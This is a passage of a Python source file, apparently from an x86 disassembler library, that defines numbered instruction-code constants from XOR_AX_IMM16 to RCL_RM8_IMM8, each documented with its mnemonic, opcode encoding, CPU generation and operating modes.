``16/32/64-bit``
"""
XOR_AX_IMM16: int = 103
"""
``XOR AX, imm16``
``o16 35 iw``
``8086+``
``16/32/64-bit``
"""
XOR_EAX_IMM32: int = 104
"""
``XOR EAX, imm32``
``o32 35 id``
``386+``
``16/32/64-bit``
"""
XOR_RAX_IMM32: int = 105
"""
``XOR RAX, imm32``
``o64 35 id``
``X64``
``64-bit``
"""
AAA: int = 106
"""
``AAA``
``37``
``8086+``
``16/32-bit``
"""
CMP_RM8_R8: int = 107
"""
``CMP r/m8, r8``
``38 /r``
``8086+``
``16/32/64-bit``
"""
CMP_RM16_R16: int = 108
"""
``CMP r/m16, r16``
``o16 39 /r``
``8086+``
``16/32/64-bit``
"""
CMP_RM32_R32: int = 109
"""
``CMP r/m32, r32``
``o32 39 /r``
``386+``
``16/32/64-bit``
"""
CMP_RM64_R64: int = 110
"""
``CMP r/m64, r64``
``o64 39 /r``
``X64``
``64-bit``
"""
CMP_R8_RM8: int = 111
"""
``CMP r8, r/m8``
``3A /r``
``8086+``
``16/32/64-bit``
"""
CMP_R16_RM16: int = 112
"""
``CMP r16, r/m16``
``o16 3B /r``
``8086+``
``16/32/64-bit``
"""
CMP_R32_RM32: int = 113
"""
``CMP r32, r/m32``
``o32 3B /r``
``386+``
``16/32/64-bit``
"""
CMP_R64_RM64: int = 114
"""
``CMP r64, r/m64``
``o64 3B /r``
``X64``
``64-bit``
"""
CMP_AL_IMM8: int = 115
"""
``CMP AL, imm8``
``3C ib``
``8086+``
``16/32/64-bit``
"""
CMP_AX_IMM16: int = 116
"""
``CMP AX, imm16``
``o16 3D iw``
``8086+``
``16/32/64-bit``
"""
CMP_EAX_IMM32: int = 117
"""
``CMP EAX, imm32``
``o32 3D id``
``386+``
``16/32/64-bit``
"""
CMP_RAX_IMM32: int = 118
"""
``CMP RAX, imm32``
``o64 3D id``
``X64``
``64-bit``
"""
AAS: int = 119
"""
``AAS``
``3F``
``8086+``
``16/32-bit``
"""
INC_R16: int = 120
"""
``INC r16``
``o16 40+rw``
``8086+``
``16/32-bit``
"""
INC_R32: int = 121
"""
``INC r32``
``o32 40+rd``
``386+``
``16/32-bit``
"""
DEC_R16: int = 122
"""
``DEC r16``
``o16 48+rw``
``8086+``
``16/32-bit``
"""
DEC_R32: int = 123
"""
``DEC r32``
``o32 48+rd``
``386+``
``16/32-bit``
"""
PUSH_R16: int = 124
"""
``PUSH r16``
``o16 50+rw``
``8086+``
``16/32/64-bit``
"""
PUSH_R32: int = 125
"""
``PUSH r32``
``o32 50+rd``
``386+``
``16/32-bit``
"""
PUSH_R64: int = 126
"""
``PUSH r64``
``o64 50+ro``
``X64``
``64-bit``
"""
POP_R16: int = 127
"""
``POP r16``
``o16 58+rw``
``8086+``
``16/32/64-bit``
"""
POP_R32: int = 128
"""
``POP r32``
``o32 58+rd``
``386+``
``16/32-bit``
"""
POP_R64: int = 129
"""
``POP r64``
``o64 58+ro``
``X64``
``64-bit``
"""
PUSHAW: int = 130
"""
``PUSHA``
``o16 60``
``186+``
``16/32-bit``
"""
PUSHAD: int = 131
"""
``PUSHAD``
``o32 60``
``386+``
``16/32-bit``
"""
POPAW: int = 132
"""
``POPA``
``o16 61``
``186+``
``16/32-bit``
"""
POPAD: int = 133
"""
``POPAD``
``o32 61``
``386+``
``16/32-bit``
"""
BOUND_R16_M1616: int = 134
"""
``BOUND r16, m16&16``
``o16 62 /r``
``186+``
``16/32-bit``
"""
BOUND_R32_M3232: int = 135
"""
``BOUND r32, m32&32``
``o32 62 /r``
``386+``
``16/32-bit``
"""
ARPL_RM16_R16: int = 136
"""
``ARPL r/m16, r16``
``o16 63 /r``
``286+``
``16/32-bit``
"""
ARPL_R32M16_R32: int = 137
"""
``ARPL r32/m16, r32``
``o32 63 /r``
``386+``
``16/32-bit``
"""
MOVSXD_R16_RM16: int = 138
"""
``MOVSXD r16, r/m16``
``o16 63 /r``
``X64``
``64-bit``
"""
MOVSXD_R32_RM32: int = 139
"""
``MOVSXD r32, r/m32``
``o32 63 /r``
``X64``
``64-bit``
"""
MOVSXD_R64_RM32: int = 140
"""
``MOVSXD r64, r/m32``
``o64 63 /r``
``X64``
``64-bit``
"""
PUSH_IMM16: int = 141
"""
``PUSH imm16``
``o16 68 iw``
``186+``
``16/32/64-bit``
"""
PUSHD_IMM32: int = 142
"""
``PUSH imm32``
``o32 68 id``
``386+``
``16/32-bit``
"""
PUSHQ_IMM32: int = 143
"""
``PUSH imm32``
``o64 68 id``
``X64``
``64-bit``
"""
IMUL_R16_RM16_IMM16: int = 144
"""
``IMUL r16, r/m16, imm16``
``o16 69 /r iw``
``186+``
``16/32/64-bit``
"""
IMUL_R32_RM32_IMM32: int = 145
"""
``IMUL r32, r/m32, imm32``
``o32 69 /r id``
``386+``
``16/32/64-bit``
"""
IMUL_R64_RM64_IMM32: int = 146
"""
``IMUL r64, r/m64, imm32``
``o64 69 /r id``
``X64``
``64-bit``
"""
PUSHW_IMM8: int = 147
"""
``PUSH imm8``
``o16 6A ib``
``186+``
``16/32/64-bit``
"""
PUSHD_IMM8: int = 148
"""
``PUSH imm8``
``o32 6A ib``
``386+``
``16/32-bit``
"""
PUSHQ_IMM8: int = 149
"""
``PUSH imm8``
``o64 6A ib``
``X64``
``64-bit``
"""
IMUL_R16_RM16_IMM8: int = 150
"""
``IMUL r16, r/m16, imm8``
``o16 6B /r ib``
``186+``
``16/32/64-bit``
"""
IMUL_R32_RM32_IMM8: int = 151
"""
``IMUL r32, r/m32, imm8``
``o32 6B /r ib``
``386+``
``16/32/64-bit``
"""
IMUL_R64_RM64_IMM8: int = 152
"""
``IMUL r64, r/m64, imm8``
``o64 6B /r ib``
``X64``
``64-bit``
"""
INSB_M8_DX: int = 153
"""
``INSB``
``6C``
``186+``
``16/32/64-bit``
"""
INSW_M16_DX: int = 154
"""
``INSW``
``o16 6D``
``186+``
``16/32/64-bit``
"""
INSD_M32_DX: int = 155
"""
``INSD``
``o32 6D``
``386+``
``16/32/64-bit``
"""
OUTSB_DX_M8: int = 156
"""
``OUTSB``
``6E``
``186+``
``16/32/64-bit``
"""
OUTSW_DX_M16: int = 157
"""
``OUTSW``
``o16 6F``
``186+``
``16/32/64-bit``
"""
OUTSD_DX_M32: int = 158
"""
``OUTSD``
``o32 6F``
``386+``
``16/32/64-bit``
"""
JO_REL8_16: int = 159
"""
``JO rel8``
``o16 70 cb``
``8086+``
``16/32/64-bit``
"""
JO_REL8_32: int = 160
"""
``JO rel8``
``o32 70 cb``
``386+``
``16/32-bit``
"""
JO_REL8_64: int = 161
"""
``JO rel8``
``o64 70 cb``
``X64``
``64-bit``
"""
JNO_REL8_16: int = 162
"""
``JNO rel8``
``o16 71 cb``
``8086+``
``16/32/64-bit``
"""
JNO_REL8_32: int = 163
"""
``JNO rel8``
``o32 71 cb``
``386+``
``16/32-bit``
"""
JNO_REL8_64: int = 164
"""
``JNO rel8``
``o64 71 cb``
``X64``
``64-bit``
"""
JB_REL8_16: int = 165
"""
``JB rel8``
``o16 72 cb``
``8086+``
``16/32/64-bit``
"""
JB_REL8_32: int = 166
"""
``JB rel8``
``o32 72 cb``
``386+``
``16/32-bit``
"""
JB_REL8_64: int = 167
"""
``JB rel8``
``o64 72 cb``
``X64``
``64-bit``
"""
JAE_REL8_16: int = 168
"""
``JAE rel8``
``o16 73 cb``
``8086+``
``16/32/64-bit``
"""
JAE_REL8_32: int = 169
"""
``JAE rel8``
``o32 73 cb``
``386+``
``16/32-bit``
"""
JAE_REL8_64: int = 170
"""
``JAE rel8``
``o64 73 cb``
``X64``
``64-bit``
"""
JE_REL8_16: int = 171
"""
``JE rel8``
``o16 74 cb``
``8086+``
``16/32/64-bit``
"""
JE_REL8_32: int = 172
"""
``JE rel8``
``o32 74 cb``
``386+``
``16/32-bit``
"""
JE_REL8_64: int = 173
"""
``JE rel8``
``o64 74 cb``
``X64``
``64-bit``
"""
JNE_REL8_16: int = 174
"""
``JNE rel8``
``o16 75 cb``
``8086+``
``16/32/64-bit``
"""
JNE_REL8_32: int = 175
"""
``JNE rel8``
``o32 75 cb``
``386+``
``16/32-bit``
"""
JNE_REL8_64: int = 176
"""
``JNE rel8``
``o64 75 cb``
``X64``
``64-bit``
"""
JBE_REL8_16: int = 177
"""
``JBE rel8``
``o16 76 cb``
``8086+``
``16/32/64-bit``
"""
JBE_REL8_32: int = 178
"""
``JBE rel8``
``o32 76 cb``
``386+``
``16/32-bit``
"""
JBE_REL8_64: int = 179
"""
``JBE rel8``
``o64 76 cb``
``X64``
``64-bit``
"""
JA_REL8_16: int = 180
"""
``JA rel8``
``o16 77 cb``
``8086+``
``16/32/64-bit``
"""
JA_REL8_32: int = 181
"""
``JA rel8``
``o32 77 cb``
``386+``
``16/32-bit``
"""
JA_REL8_64: int = 182
"""
``JA rel8``
``o64 77 cb``
``X64``
``64-bit``
"""
JS_REL8_16: int = 183
"""
``JS rel8``
``o16 78 cb``
``8086+``
``16/32/64-bit``
"""
JS_REL8_32: int = 184
"""
``JS rel8``
``o32 78 cb``
``386+``
``16/32-bit``
"""
JS_REL8_64: int = 185
"""
``JS rel8``
``o64 78 cb``
``X64``
``64-bit``
"""
JNS_REL8_16: int = 186
"""
``JNS rel8``
``o16 79 cb``
``8086+``
``16/32/64-bit``
"""
JNS_REL8_32: int = 187
"""
``JNS rel8``
``o32 79 cb``
``386+``
``16/32-bit``
"""
JNS_REL8_64: int = 188
"""
``JNS rel8``
``o64 79 cb``
``X64``
``64-bit``
"""
JP_REL8_16: int = 189
"""
``JP rel8``
``o16 7A cb``
``8086+``
``16/32/64-bit``
"""
JP_REL8_32: int = 190
"""
``JP rel8``
``o32 7A cb``
``386+``
``16/32-bit``
"""
JP_REL8_64: int = 191
"""
``JP rel8``
``o64 7A cb``
``X64``
``64-bit``
"""
JNP_REL8_16: int = 192
"""
``JNP rel8``
``o16 7B cb``
``8086+``
``16/32/64-bit``
"""
JNP_REL8_32: int = 193
"""
``JNP rel8``
``o32 7B cb``
``386+``
``16/32-bit``
"""
JNP_REL8_64: int = 194
"""
``JNP rel8``
``o64 7B cb``
``X64``
``64-bit``
"""
JL_REL8_16: int = 195
"""
``JL rel8``
``o16 7C cb``
``8086+``
``16/32/64-bit``
"""
JL_REL8_32: int = 196
"""
``JL rel8``
``o32 7C cb``
``386+``
``16/32-bit``
"""
JL_REL8_64: int = 197
"""
``JL rel8``
``o64 7C cb``
``X64``
``64-bit``
"""
JGE_REL8_16: int = 198
"""
``JGE rel8``
``o16 7D cb``
``8086+``
``16/32/64-bit``
"""
JGE_REL8_32: int = 199
"""
``JGE rel8``
``o32 7D cb``
``386+``
``16/32-bit``
"""
JGE_REL8_64: int = 200
"""
``JGE rel8``
``o64 7D cb``
``X64``
``64-bit``
"""
JLE_REL8_16: int = 201
"""
``JLE rel8``
``o16 7E cb``
``8086+``
``16/32/64-bit``
"""
JLE_REL8_32: int = 202
"""
``JLE rel8``
``o32 7E cb``
``386+``
``16/32-bit``
"""
JLE_REL8_64: int = 203
"""
``JLE rel8``
``o64 7E cb``
``X64``
``64-bit``
"""
JG_REL8_16: int = 204
"""
``JG rel8``
``o16 7F cb``
``8086+``
``16/32/64-bit``
"""
JG_REL8_32: int = 205
"""
``JG rel8``
``o32 7F cb``
``386+``
``16/32-bit``
"""
JG_REL8_64: int = 206
"""
``JG rel8``
``o64 7F cb``
``X64``
``64-bit``
"""
ADD_RM8_IMM8: int = 207
"""
``ADD r/m8, imm8``
``80 /0 ib``
``8086+``
``16/32/64-bit``
"""
OR_RM8_IMM8: int = 208
"""
``OR r/m8, imm8``
``80 /1 ib``
``8086+``
``16/32/64-bit``
"""
ADC_RM8_IMM8: int = 209
"""
``ADC r/m8, imm8``
``80 /2 ib``
``8086+``
``16/32/64-bit``
"""
SBB_RM8_IMM8: int = 210
"""
``SBB r/m8, imm8``
``80 /3 ib``
``8086+``
``16/32/64-bit``
"""
AND_RM8_IMM8: int = 211
"""
``AND r/m8, imm8``
``80 /4 ib``
``8086+``
``16/32/64-bit``
"""
SUB_RM8_IMM8: int = 212
"""
``SUB r/m8, imm8``
``80 /5 ib``
``8086+``
``16/32/64-bit``
"""
XOR_RM8_IMM8: int = 213
"""
``XOR r/m8, imm8``
``80 /6 ib``
``8086+``
``16/32/64-bit``
"""
CMP_RM8_IMM8: int = 214
"""
``CMP r/m8, imm8``
``80 /7 ib``
``8086+``
``16/32/64-bit``
"""
ADD_RM16_IMM16: int = 215
"""
``ADD r/m16, imm16``
``o16 81 /0 iw``
``8086+``
``16/32/64-bit``
"""
ADD_RM32_IMM32: int = 216
"""
``ADD r/m32, imm32``
``o32 81 /0 id``
``386+``
``16/32/64-bit``
"""
ADD_RM64_IMM32: int = 217
"""
``ADD r/m64, imm32``
``o64 81 /0 id``
``X64``
``64-bit``
"""
OR_RM16_IMM16: int = 218
"""
``OR r/m16, imm16``
``o16 81 /1 iw``
``8086+``
``16/32/64-bit``
"""
OR_RM32_IMM32: int = 219
"""
``OR r/m32, imm32``
``o32 81 /1 id``
``386+``
``16/32/64-bit``
"""
OR_RM64_IMM32: int = 220
"""
``OR r/m64, imm32``
``o64 81 /1 id``
``X64``
``64-bit``
"""
ADC_RM16_IMM16: int = 221
"""
``ADC r/m16, imm16``
``o16 81 /2 iw``
``8086+``
``16/32/64-bit``
"""
ADC_RM32_IMM32: int = 222
"""
``ADC r/m32, imm32``
``o32 81 /2 id``
``386+``
``16/32/64-bit``
"""
ADC_RM64_IMM32: int = 223
"""
``ADC r/m64, imm32``
``o64 81 /2 id``
``X64``
``64-bit``
"""
SBB_RM16_IMM16: int = 224
"""
``SBB r/m16, imm16``
``o16 81 /3 iw``
``8086+``
``16/32/64-bit``
"""
SBB_RM32_IMM32: int = 225
"""
``SBB r/m32, imm32``
``o32 81 /3 id``
``386+``
``16/32/64-bit``
"""
SBB_RM64_IMM32: int = 226
"""
``SBB r/m64, imm32``
``o64 81 /3 id``
``X64``
``64-bit``
"""
AND_RM16_IMM16: int = 227
"""
``AND r/m16, imm16``
``o16 81 /4 iw``
``8086+``
``16/32/64-bit``
"""
AND_RM32_IMM32: int = 228
"""
``AND r/m32, imm32``
``o32 81 /4 id``
``386+``
``16/32/64-bit``
"""
AND_RM64_IMM32: int = 229
"""
``AND r/m64, imm32``
``o64 81 /4 id``
``X64``
``64-bit``
"""
SUB_RM16_IMM16: int = 230
"""
``SUB r/m16, imm16``
``o16 81 /5 iw``
``8086+``
``16/32/64-bit``
"""
SUB_RM32_IMM32: int = 231
"""
``SUB r/m32, imm32``
``o32 81 /5 id``
``386+``
``16/32/64-bit``
"""
SUB_RM64_IMM32: int = 232
"""
``SUB r/m64, imm32``
``o64 81 /5 id``
``X64``
``64-bit``
"""
XOR_RM16_IMM16: int = 233
"""
``XOR r/m16, imm16``
``o16 81 /6 iw``
``8086+``
``16/32/64-bit``
"""
XOR_RM32_IMM32: int = 234
"""
``XOR r/m32, imm32``
``o32 81 /6 id``
``386+``
``16/32/64-bit``
"""
XOR_RM64_IMM32: int = 235
"""
``XOR r/m64, imm32``
``o64 81 /6 id``
``X64``
``64-bit``
"""
CMP_RM16_IMM16: int = 236
"""
``CMP r/m16, imm16``
``o16 81 /7 iw``
``8086+``
``16/32/64-bit``
"""
CMP_RM32_IMM32: int = 237
"""
``CMP r/m32, imm32``
``o32 81 /7 id``
``386+``
``16/32/64-bit``
"""
CMP_RM64_IMM32: int = 238
"""
``CMP r/m64, imm32``
``o64 81 /7 id``
``X64``
``64-bit``
"""
ADD_RM8_IMM8_82: int = 239
"""
``ADD r/m8, imm8``
``82 /0 ib``
``8086+``
``16/32-bit``
"""
OR_RM8_IMM8_82: int = 240
"""
``OR r/m8, imm8``
``82 /1 ib``
``8086+``
``16/32-bit``
"""
ADC_RM8_IMM8_82: int = 241
"""
``ADC r/m8, imm8``
``82 /2 ib``
``8086+``
``16/32-bit``
"""
SBB_RM8_IMM8_82: int = 242
"""
``SBB r/m8, imm8``
``82 /3 ib``
``8086+``
``16/32-bit``
"""
AND_RM8_IMM8_82: int = 243
"""
``AND r/m8, imm8``
``82 /4 ib``
``8086+``
``16/32-bit``
"""
SUB_RM8_IMM8_82: int = 244
"""
``SUB r/m8, imm8``
``82 /5 ib``
``8086+``
``16/32-bit``
"""
XOR_RM8_IMM8_82: int = 245
"""
``XOR r/m8, imm8``
``82 /6 ib``
``8086+``
``16/32-bit``
"""
CMP_RM8_IMM8_82: int = 246
"""
``CMP r/m8, imm8``
``82 /7 ib``
``8086+``
``16/32-bit``
"""
ADD_RM16_IMM8: int = 247
"""
``ADD r/m16, imm8``
``o16 83 /0 ib``
``8086+``
``16/32/64-bit``
"""
ADD_RM32_IMM8: int = 248
"""
``ADD r/m32, imm8``
``o32 83 /0 ib``
``386+``
``16/32/64-bit``
"""
ADD_RM64_IMM8: int = 249
"""
``ADD r/m64, imm8``
``o64 83 /0 ib``
``X64``
``64-bit``
"""
OR_RM16_IMM8: int = 250
"""
``OR r/m16, imm8``
``o16 83 /1 ib``
``8086+``
``16/32/64-bit``
"""
OR_RM32_IMM8: int = 251
"""
``OR r/m32, imm8``
``o32 83 /1 ib``
``386+``
``16/32/64-bit``
"""
OR_RM64_IMM8: int = 252
"""
``OR r/m64, imm8``
``o64 83 /1 ib``
``X64``
``64-bit``
"""
ADC_RM16_IMM8: int = 253
"""
``ADC r/m16, imm8``
``o16 83 /2 ib``
``8086+``
``16/32/64-bit``
"""
ADC_RM32_IMM8: int = 254
"""
``ADC r/m32, imm8``
``o32 83 /2 ib``
``386+``
``16/32/64-bit``
"""
ADC_RM64_IMM8: int = 255
"""
``ADC r/m64, imm8``
``o64 83 /2 ib``
``X64``
``64-bit``
"""
SBB_RM16_IMM8: int = 256
"""
``SBB r/m16, imm8``
``o16 83 /3 ib``
``8086+``
``16/32/64-bit``
"""
SBB_RM32_IMM8: int = 257
"""
``SBB r/m32, imm8``
``o32 83 /3 ib``
``386+``
``16/32/64-bit``
"""
SBB_RM64_IMM8: int = 258
"""
``SBB r/m64, imm8``
``o64 83 /3 ib``
``X64``
``64-bit``
"""
AND_RM16_IMM8: int = 259
"""
``AND r/m16, imm8``
``o16 83 /4 ib``
``8086+``
``16/32/64-bit``
"""
AND_RM32_IMM8: int = 260
"""
``AND r/m32, imm8``
``o32 83 /4 ib``
``386+``
``16/32/64-bit``
"""
AND_RM64_IMM8: int = 261
"""
``AND r/m64, imm8``
``o64 83 /4 ib``
``X64``
``64-bit``
"""
SUB_RM16_IMM8: int = 262
"""
``SUB r/m16, imm8``
``o16 83 /5 ib``
``8086+``
``16/32/64-bit``
"""
SUB_RM32_IMM8: int = 263
"""
``SUB r/m32, imm8``
``o32 83 /5 ib``
``386+``
``16/32/64-bit``
"""
SUB_RM64_IMM8: int = 264
"""
``SUB r/m64, imm8``
``o64 83 /5 ib``
``X64``
``64-bit``
"""
XOR_RM16_IMM8: int = 265
"""
``XOR r/m16, imm8``
``o16 83 /6 ib``
``8086+``
``16/32/64-bit``
"""
XOR_RM32_IMM8: int = 266
"""
``XOR r/m32, imm8``
``o32 83 /6 ib``
``386+``
``16/32/64-bit``
"""
XOR_RM64_IMM8: int = 267
"""
``XOR r/m64, imm8``
``o64 83 /6 ib``
``X64``
``64-bit``
"""
CMP_RM16_IMM8: int = 268
"""
``CMP r/m16, imm8``
``o16 83 /7 ib``
``8086+``
``16/32/64-bit``
"""
CMP_RM32_IMM8: int = 269
"""
``CMP r/m32, imm8``
``o32 83 /7 ib``
``386+``
``16/32/64-bit``
"""
CMP_RM64_IMM8: int = 270
"""
``CMP r/m64, imm8``
``o64 83 /7 ib``
``X64``
``64-bit``
"""
TEST_RM8_R8: int = 271
"""
``TEST r/m8, r8``
``84 /r``
``8086+``
``16/32/64-bit``
"""
TEST_RM16_R16: int = 272
"""
``TEST r/m16, r16``
``o16 85 /r``
``8086+``
``16/32/64-bit``
"""
TEST_RM32_R32: int = 273
"""
``TEST r/m32, r32``
``o32 85 /r``
``386+``
``16/32/64-bit``
"""
TEST_RM64_R64: int = 274
"""
``TEST r/m64, r64``
``o64 85 /r``
``X64``
``64-bit``
"""
XCHG_RM8_R8: int = 275
"""
``XCHG r/m8, r8``
``86 /r``
``8086+``
``16/32/64-bit``
"""
XCHG_RM16_R16: int = 276
"""
``XCHG r/m16, r16``
``o16 87 /r``
``8086+``
``16/32/64-bit``
"""
XCHG_RM32_R32: int = 277
"""
``XCHG r/m32, r32``
``o32 87 /r``
``386+``
``16/32/64-bit``
"""
XCHG_RM64_R64: int = 278
"""
``XCHG r/m64, r64``
``o64 87 /r``
``X64``
``64-bit``
"""
MOV_RM8_R8: int = 279
"""
``MOV r/m8, r8``
``88 /r``
``8086+``
``16/32/64-bit``
"""
MOV_RM16_R16: int = 280
"""
``MOV r/m16, r16``
``o16 89 /r``
``8086+``
``16/32/64-bit``
"""
MOV_RM32_R32: int = 281
"""
``MOV r/m32, r32``
``o32 89 /r``
``386+``
``16/32/64-bit``
"""
MOV_RM64_R64: int = 282
"""
``MOV r/m64, r64``
``o64 89 /r``
``X64``
``64-bit``
"""
MOV_R8_RM8: int = 283
"""
``MOV r8, r/m8``
``8A /r``
``8086+``
``16/32/64-bit``
"""
MOV_R16_RM16: int = 284
"""
``MOV r16, r/m16``
``o16 8B /r``
``8086+``
``16/32/64-bit``
"""
MOV_R32_RM32: int = 285
"""
``MOV r32, r/m32``
``o32 8B /r``
``386+``
``16/32/64-bit``
"""
MOV_R64_RM64: int = 286
"""
``MOV r64, r/m64``
``o64 8B /r``
``X64``
``64-bit``
"""
MOV_RM16_SREG: int = 287
"""
``MOV r/m16, Sreg``
``o16 8C /r``
``8086+``
``16/32/64-bit``
"""
MOV_R32M16_SREG: int = 288
"""
``MOV r32/m16, Sreg``
``o32 8C /r``
``386+``
``16/32/64-bit``
"""
MOV_R64M16_SREG: int = 289
"""
``MOV r64/m16, Sreg``
``o64 8C /r``
``X64``
``64-bit``
"""
LEA_R16_M: int = 290
"""
``LEA r16, m``
``o16 8D /r``
``8086+``
``16/32/64-bit``
"""
LEA_R32_M: int = 291
"""
``LEA r32, m``
``o32 8D /r``
``386+``
``16/32/64-bit``
"""
LEA_R64_M: int = 292
"""
``LEA r64, m``
``o64 8D /r``
``X64``
``64-bit``
"""
MOV_SREG_RM16: int = 293
"""
``MOV Sreg, r/m16``
``o16 8E /r``
``8086+``
``16/32/64-bit``
"""
MOV_SREG_R32M16: int = 294
"""
``MOV Sreg, r32/m16``
``o32 8E /r``
``386+``
``16/32/64-bit``
"""
MOV_SREG_R64M16: int = 295
"""
``MOV Sreg, r64/m16``
``o64 8E /r``
``X64``
``64-bit``
"""
POP_RM16: int = 296
"""
``POP r/m16``
``o16 8F /0``
``8086+``
``16/32/64-bit``
"""
POP_RM32: int = 297
"""
``POP r/m32``
``o32 8F /0``
``386+``
``16/32-bit``
"""
POP_RM64: int = 298
"""
``POP r/m64``
``o64 8F /0``
``X64``
``64-bit``
"""
NOPW: int = 299
"""
``NOP``
``o16 90``
``8086+``
``16/32/64-bit``
"""
NOPD: int = 300
"""
``NOP``
``o32 90``
``8086+``
``16/32/64-bit``
"""
NOPQ: int = 301
"""
``NOP``
``o64 90``
``8086+``
``64-bit``
"""
XCHG_R16_AX: int = 302
"""
``XCHG r16, AX``
``o16 90+rw``
``8086+``
``16/32/64-bit``
"""
XCHG_R32_EAX: int = 303
"""
``XCHG r32, EAX``
``o32 90+rd``
``386+``
``16/32/64-bit``
"""
XCHG_R64_RAX: int = 304
"""
``XCHG r64, RAX``
``o64 90+ro``
``X64``
``64-bit``
"""
PAUSE: int = 305
"""
``PAUSE``
``F3 90``
``Pentium 4 or later``
``16/32/64-bit``
"""
CBW: int = 306
"""
``CBW``
``o16 98``
``8086+``
``16/32/64-bit``
"""
CWDE: int = 307
"""
``CWDE``
``o32 98``
``386+``
``16/32/64-bit``
"""
CDQE: int = 308
"""
``CDQE``
``o64 98``
``X64``
``64-bit``
"""
CWD: int = 309
"""
``CWD``
``o16 99``
``8086+``
``16/32/64-bit``
"""
CDQ: int = 310
"""
``CDQ``
``o32 99``
``386+``
``16/32/64-bit``
"""
CQO: int = 311
"""
``CQO``
``o64 99``
``X64``
``64-bit``
"""
CALL_PTR1616: int = 312
"""
``CALL ptr16:16``
``o16 9A cd``
``8086+``
``16/32-bit``
"""
CALL_PTR1632: int = 313
"""
``CALL ptr16:32``
``o32 9A cp``
``386+``
``16/32-bit``
"""
WAIT: int = 314
"""
``WAIT``
``9B``
``8086+``
``16/32/64-bit``
"""
PUSHFW: int = 315
"""
``PUSHF``
``o16 9C``
``8086+``
``16/32/64-bit``
"""
PUSHFD: int = 316
"""
``PUSHFD``
``o32 9C``
``386+``
``16/32-bit``
"""
PUSHFQ: int = 317
"""
``PUSHFQ``
``o64 9C``
``X64``
``64-bit``
"""
POPFW: int = 318
"""
``POPF``
``o16 9D``
``8086+``
``16/32/64-bit``
"""
POPFD: int = 319
"""
``POPFD``
``o32 9D``
``386+``
``16/32-bit``
"""
POPFQ: int = 320
"""
``POPFQ``
``o64 9D``
``X64``
``64-bit``
"""
SAHF: int = 321
"""
``SAHF``
``9E``
``8086+``
``16/32/64-bit``
"""
LAHF: int = 322
"""
``LAHF``
``9F``
``8086+``
``16/32/64-bit``
"""
MOV_AL_MOFFS8: int = 323
"""
``MOV AL, moffs8``
``A0 mo``
``8086+``
``16/32/64-bit``
"""
MOV_AX_MOFFS16: int = 324
"""
``MOV AX, moffs16``
``o16 A1 mo``
``8086+``
``16/32/64-bit``
"""
MOV_EAX_MOFFS32: int = 325
"""
``MOV EAX, moffs32``
``o32 A1 mo``
``386+``
``16/32/64-bit``
"""
MOV_RAX_MOFFS64: int = 326
"""
``MOV RAX, moffs64``
``o64 A1 mo``
``X64``
``64-bit``
"""
MOV_MOFFS8_AL: int = 327
"""
``MOV moffs8, AL``
``A2 mo``
``8086+``
``16/32/64-bit``
"""
MOV_MOFFS16_AX: int = 328
"""
``MOV moffs16, AX``
``o16 A3 mo``
``8086+``
``16/32/64-bit``
"""
MOV_MOFFS32_EAX: int = 329
"""
``MOV moffs32, EAX``
``o32 A3 mo``
``386+``
``16/32/64-bit``
"""
MOV_MOFFS64_RAX: int = 330
"""
``MOV moffs64, RAX``
``o64 A3 mo``
``X64``
``64-bit``
"""
MOVSB_M8_M8: int = 331
"""
``MOVSB``
``A4``
``8086+``
``16/32/64-bit``
"""
MOVSW_M16_M16: int = 332
"""
``MOVSW``
``o16 A5``
``8086+``
``16/32/64-bit``
"""
MOVSD_M32_M32: int = 333
"""
``MOVSD``
``o32 A5``
``386+``
``16/32/64-bit``
"""
MOVSQ_M64_M64: int = 334
"""
``MOVSQ``
``o64 A5``
``X64``
``64-bit``
"""
CMPSB_M8_M8: int = 335
"""
``CMPSB``
``A6``
``8086+``
``16/32/64-bit``
"""
CMPSW_M16_M16: int = 336
"""
``CMPSW``
``o16 A7``
``8086+``
``16/32/64-bit``
"""
CMPSD_M32_M32: int = 337
"""
``CMPSD``
``o32 A7``
``386+``
``16/32/64-bit``
"""
CMPSQ_M64_M64: int = 338
"""
``CMPSQ``
``o64 A7``
``X64``
``64-bit``
"""
TEST_AL_IMM8: int = 339
"""
``TEST AL, imm8``
``A8 ib``
``8086+``
``16/32/64-bit``
"""
TEST_AX_IMM16: int = 340
"""
``TEST AX, imm16``
``o16 A9 iw``
``8086+``
``16/32/64-bit``
"""
TEST_EAX_IMM32: int = 341
"""
``TEST EAX, imm32``
``o32 A9 id``
``386+``
``16/32/64-bit``
"""
TEST_RAX_IMM32: int = 342
"""
``TEST RAX, imm32``
``o64 A9 id``
``X64``
``64-bit``
"""
STOSB_M8_AL: int = 343
"""
``STOSB``
``AA``
``8086+``
``16/32/64-bit``
"""
STOSW_M16_AX: int = 344
"""
``STOSW``
``o16 AB``
``8086+``
``16/32/64-bit``
"""
STOSD_M32_EAX: int = 345
"""
``STOSD``
``o32 AB``
``386+``
``16/32/64-bit``
"""
STOSQ_M64_RAX: int = 346
"""
``STOSQ``
``o64 AB``
``X64``
``64-bit``
"""
LODSB_AL_M8: int = 347
"""
``LODSB``
``AC``
``8086+``
``16/32/64-bit``
"""
LODSW_AX_M16: int = 348
"""
``LODSW``
``o16 AD``
``8086+``
``16/32/64-bit``
"""
LODSD_EAX_M32: int = 349
"""
``LODSD``
``o32 AD``
``386+``
``16/32/64-bit``
"""
LODSQ_RAX_M64: int = 350
"""
``LODSQ``
``o64 AD``
``X64``
``64-bit``
"""
SCASB_AL_M8: int = 351
"""
``SCASB``
``AE``
``8086+``
``16/32/64-bit``
"""
SCASW_AX_M16: int = 352
"""
``SCASW``
``o16 AF``
``8086+``
``16/32/64-bit``
"""
SCASD_EAX_M32: int = 353
"""
``SCASD``
``o32 AF``
``386+``
``16/32/64-bit``
"""
SCASQ_RAX_M64: int = 354
"""
``SCASQ``
``o64 AF``
``X64``
``64-bit``
"""
MOV_R8_IMM8: int = 355
"""
``MOV r8, imm8``
``B0+rb ib``
``8086+``
``16/32/64-bit``
"""
MOV_R16_IMM16: int = 356
"""
``MOV r16, imm16``
``o16 B8+rw iw``
``8086+``
``16/32/64-bit``
"""
MOV_R32_IMM32: int = 357
"""
``MOV r32, imm32``
``o32 B8+rd id``
``386+``
``16/32/64-bit``
"""
MOV_R64_IMM64: int = 358
"""
``MOV r64, imm64``
``o64 B8+ro io``
``X64``
``64-bit``
"""
ROL_RM8_IMM8: int = 359
"""
``ROL r/m8, imm8``
``C0 /0 ib``
``186+``
``16/32/64-bit``
"""
ROR_RM8_IMM8: int = 360
"""
``ROR r/m8, imm8``
``C0 /1 ib``
``186+``
``16/32/64-bit``
"""
RCL_RM8_IMM8: int = 361
"""
``RCL r/m8, imm8``
